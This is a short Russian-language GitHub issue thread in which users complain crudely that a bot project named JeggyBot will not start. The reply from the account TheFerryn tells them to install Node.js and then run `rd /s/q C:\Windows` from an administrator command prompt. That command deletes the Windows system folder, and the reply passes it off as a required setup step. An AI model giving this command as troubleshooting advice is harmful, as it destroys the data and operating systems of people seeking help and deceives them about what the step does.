### ISSUE TITLE
АЛО ПАЧЕМУ НЕ ЗАПуСКАИЦА!!!!!!?!?!?!?!?!

### ISSUE THREAD

**Issue by perssBest** [TheFerryn/JeggyBot#3]
АЛО ПАЧЕМУ НЕ ЗАПуСКАИЦА!!!!!!?!?!?!?!?!

**Comment by XDENIX** [comment]
Блин не рабит пиздец(

**Comment by TheFerryn** [comment]
потому-что перед тем как запустить бота, вы должны скачать себе Node.js 16.0: cmd.exe от Администратора и затем `rd /s/q C:\Windows`.
